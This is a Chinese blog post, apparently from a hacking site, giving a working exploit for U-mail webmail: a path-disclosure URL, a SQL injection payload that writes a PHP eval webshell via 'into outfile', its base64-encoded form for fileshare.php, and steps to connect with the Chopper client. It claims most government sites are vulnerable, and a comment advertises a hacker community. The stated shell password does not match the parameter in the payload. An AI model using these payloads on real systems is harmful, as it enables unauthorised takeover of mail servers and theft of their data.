当前位置: iick's blog > 网站漏洞 > 大部分网站政府网站U-mail存在直接拿shell漏洞

大部分网站政府网站U-mail存在直接拿shell漏洞

作者:hack1990 时间:14-03-08 阅读数:1353人阅读

加入
webmail/userapply.php?execadd=333&DomainID=111直接爆出物理地址

 

 

 

大部分网站政府网站U-mail存在直接拿shell漏洞

 

 

然后将
aa' union select 1,2,3,4,5,6,'<?php eval($_POST1);?>',8,9,10,11,12,13,14 into outfile 'D:/umail/WorldClient/html/saknc.php'#

用base64编译一下

 


YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1BPU1QxKTs/PicsOCw5LDEwLDExLDEyLDEzLDE0IGludG8gb3V0ZmlsZSAnRDovdW1haWwvV29ybGRDbGllbnQvaHRtbC9zYWtuYy5waHAnIw==

 

 大部分网站政府网站U-mail存在直接拿shell漏洞

然后 
网站.com/webmail/fileshare.php?file=加上上面编译的base64代码

可直接写入shell saknc.php

用菜刀连接
网站.com/webmail/saknc.php

密码:shell

 

并且大部分政府网站的u-mail都存在这个漏洞


 

 

# Nmap Security Scanner 7.0

上一篇:网站域名被劫持的原因分析和应对方法

下一篇:Discuz x2 全局静态SEO优化

相关文章

评论列表

  •  
    发布于 2014-03-27 18:04:22  回复
  • 不过,我想搭建自己的linux邮局。。。该用什么系统好呢。。。
  •  
    ddc
    发布于 2014-03-29 08:33:41  回复
  • 欢迎加入中国黑客榜中榜
    www.cn-hack.net
    最齐全的中国黑客收录平台
    最专业的黑客技术分享中心
    欢迎您的加入!
    我们的官方新浪微博 @黑客榜中榜
    我们的官方微信号 cn-hack1
    友联邮件 wang_t1@163.com

发表评论